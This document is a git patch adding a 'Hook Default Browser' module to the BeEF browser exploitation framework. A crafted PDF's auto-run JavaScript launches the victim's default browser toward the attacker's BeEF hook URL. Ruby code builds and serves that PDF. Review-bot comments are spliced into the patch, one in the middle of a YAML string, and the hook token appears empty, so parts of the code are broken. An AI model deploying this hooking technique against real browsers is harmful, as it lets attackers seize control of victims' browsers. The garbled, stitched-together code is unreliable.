From c83ec8cf2972aadde60eb299b3302931f4d979d0 Mon Sep 17 00:00:00 2001
From: "a.m.saafan@gmail.com"
Date: Tue, 23 Aug 2011 09:56:57 +0000
Subject: [PATCH] Fixes for cross domain issues in the 'hook default' module and rename it. Fixes issue 419.
git-svn-id: https://beef.googlecode.com/svn/trunk@1228 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 modules/browser/hook_default/bounce_to_ie.pdf | 79 +++++++++++++++++++
 modules/browser/hook_default/command.js | 22 ++++++
 modules/browser/hook_default/config.yaml | 25 ++++++
 modules/browser/hook_default/module.rb | 58 ++++++++++++++
 4 files changed, 184 insertions(+)
 create mode 100755 modules/browser/hook_default/bounce_to_ie.pdf
 create mode 100644 modules/browser/hook_default/command.js
 create mode 100644 modules/browser/hook_default/config.yaml
 create mode 100644 modules/browser/hook_default/module.rb
diff --git a/modules/browser/hook_default/bounce_to_ie.pdf b/modules/browser/hook_default/bounce_to_ie.pdf
new file mode 100755
index 000000000..f0230f9a8
--- /dev/null
+++ b/modules/browser/hook_default/bounce_to_ie.pdf
@@ -0,0 +1,79 @@
+%PDF-1.1
+1 0 obj
+<<
+ /Pages 3 0 R
+ /OpenAction 4 0 R
+ /Type /Catalog
+>>
+endobj
+2 0 obj
+<<
+ /Encoding /MacRomanEncoding
+ /Subtype /Type1
+ /BaseFont /Helvetica
+ /Type /Font
+ /Name /F1
+>>
+endobj
+3 0 obj
+<<
+ /Kids [ 5 0 R ]
+ /Type /Pages
+ /Count 1
+>>
+endobj
+4 0 obj
+<<
+ /S /JavaScript
+ /JS 6 0 R
+>>
+endobj
+5 0 obj
+<<
+ /MediaBox [ 0 0 795 842 ]
+ /Contents 7 0 R
+ /Parent 3 0 R
+ /Resources <<
+ /Font <<
+ /F1 2 0 R
+ >>
+ /ProcSet [ /PDF /Text ]
+ >>
+ /Type /Page
+>>
+endobj
+6 0 obj
+<<
+ /Length 1708
+>>stream
+app.launchURL("",true);
+endstream
+endobj
+7 0 obj
+<<
+ /Length 48
+>>stream
+BT
+
+ET
+endstream
+endobj
+xref
+0 8
+0000000000 65535 f
+0000000010 00000 n
+0000000087 00000 n
+0000000209 00000 n
+0000000278 00000 n
+0000000332 00000 n
+0000000513 00000 n
+0000002278 00000 n
+trailer
+<<
+ /Size 8
+ /ID [ (11f570958af49b794c95ff1c6be3bac5) (11f570958af49b794c95ff1c6be3bac5) ]
+ /Root 1 0 R
+>>
+startxref
+2381
+%%EOF
diff --git a/modules/browser/hook_default/command.js b/modules/browser/hook_default/command.js
new file mode 100644
index 000000000..683999892
--- /dev/null
+++ b/modules/browser/hook_default/command.js
@@ -0,0 +1,22 @@
+//
+// Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var pdf_url = 'http://'+beef.net.host+ ':' + beef.net.port + '/report.pdf';
+ window.open( pdf_url, '_blank');
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, "Attempted to open PDF in default browser.");
+});
diff --git a/modules/browser/hook_default/config.yaml b/modules/browser/hook_default/config.yaml
new file mode 100644
index 000000000..30afe8e51
--- /dev/null
+++ b/modules/browser/hook_default/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ hook_ie:
+ enable: true
+ category: "Browser"
+ name: "Hook Default Browser"
+ description: "This module will use a PDF to attempt to hook the default browser (assuming it isn't currently hooked).
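Review bot: `pdf_url` hard-codes the `http://` scheme and the `/report.pdf` path, duplicating what module.rb appears to register through `AssetHandler.instance.bind(..., '/report', 'pdf', -1)`; if BeEF is served over a different scheme or the bind path is changed in the Ruby side, the two files drift apart with no error at either end. Passing the URL from pre_send through the template instead (for instance an instance variable such as `@pdf_url` — name constructed — rendered as `'<%= @pdf_url %>'` next to the existing `@command_url`) keeps a single source of truth for both scheme and path. A one-line header comment above `beef.execute`, e.g. `// Opens the PDF that module.rb binds at /report.pdf; the PDF itself carries the hook URI.`, would also make the dependency on the Ruby side visible from this file.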

Normally, this will be IE but it will also work when Chrome is set to the default. When executed, the hooked browser will load a PDF and use that to start the default browser. If successful another browser will appear in the browser tree."
+ authors: ["saafan"]
+ target:
+ working: ["All"]
diff --git a/modules/browser/hook_default/module.rb b/modules/browser/hook_default/module.rb
new file mode 100644
index 000000000..a80072803
--- /dev/null
+++ b/modules/browser/hook_default/module.rb
@@ -0,0 +1,58 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+class Hook_ie < BeEF::Core::Command
+
+ def pre_send
+ #Get the servers configurations.
+ configuration = BeEF::Core::Configuration.instance
+
+ #The hook url to be replace the token in the original pdf file.
+ hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html"
+
+ # A new pdf file containg the actual hook URI instead of the dummy token.
+ configured_hook_file = File.open("./modules/browser/hook_ie/bounce_to_ie_configured.pdf","w")
+
+ # The original pdf file contains a token that will get replaced during the initialization with
+ # the actual hook URI of beef. Note that the hook URI is accessed via the DNS name.
+ File.open('./modules/browser/hook_ie/bounce_to_ie.pdf',"r") { |original_hook_file|
+ original_hook_file.each_line { |line|
+ # If the line includes the hook token, then replace it with the actual hook URI
+ if(line.include? '')
+ line = line.sub(//, hook_uri)
+ end
+ #write the line to a new file
+ configured_hook_file.write(line)
+ }
+ }
+
+ configured_hook_file.close()
+
+
+ #Bind the configured PDF file to the web server.
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/hook_ie/bounce_to_ie_configured.pdf', '/report', 'pdf', -1);
+
+ end
+
+ def post_execute
+ content = {}
+ content['result'] = @datastore['result']
+
+ save content
+ #update_zombie!
+ end
+
+end
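Review bot: Every path in pre_send still points at `./modules/browser/hook_ie/` (both `File.open` calls and the first argument of the `AssetHandler` bind), while this commit creates the files under `modules/browser/hook_default/`, so pre_send will raise Errno::ENOENT once the old directory is gone; the same leftover name survives as the `hook_ie:` key in the config.yaml hunk and as the `Hook_ie` class name, which may also matter if BeEF maps config keys to module directories. As the page shows it, the token is empty — `line.include? ''` is always true and `line.sub(//, hook_uri)` prepends the URI to every line — which is presumably an extraction loss (the PDF hunk shows the same blank inside `app.launchURL("",true)`), but either way the token belongs in one named constant rather than two inline literals. `configured_hook_file` is opened with "w" outside a block, so an exception while reading the template leaks the handle and leaves a truncated PDF on disk; resolving both paths from `File.dirname(__FILE__)` and doing the rewrite with `File.read` plus block-form `File.open`, as sketched below, fixes the location and the cleanup together. Note also that the template's `/Length 1708` and xref offsets are fixed while the JavaScript stream is rewritten with a URI of arbitrary length, so the regenerated PDF's cross-reference data will generally be inaccurate; most readers tolerate that, but if it causes trouble the length would have to be recomputed here.
```ruby
  # Token inside bounce_to_ie.pdf that pre_send swaps for the real hook URI.
  HOOK_TOKEN = '<PLACEHOLDER: token string used in bounce_to_ie.pdf>'
  MODULE_DIR = File.dirname(__FILE__)

  def pre_send
    # … unchanged: configuration lookup and hook_uri construction …

    # Read the template, substitute the token, write the result; the block form
    # closes the output handle even if the write raises.
    template = File.read(File.join(MODULE_DIR, 'bounce_to_ie.pdf'))
    File.open(File.join(MODULE_DIR, 'bounce_to_ie_configured.pdf'), 'w') do |out|
      out.write(template.gsub(HOOK_TOKEN, hook_uri))
    end

    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/hook_default/bounce_to_ie_configured.pdf', '/report', 'pdf', -1)
  end
```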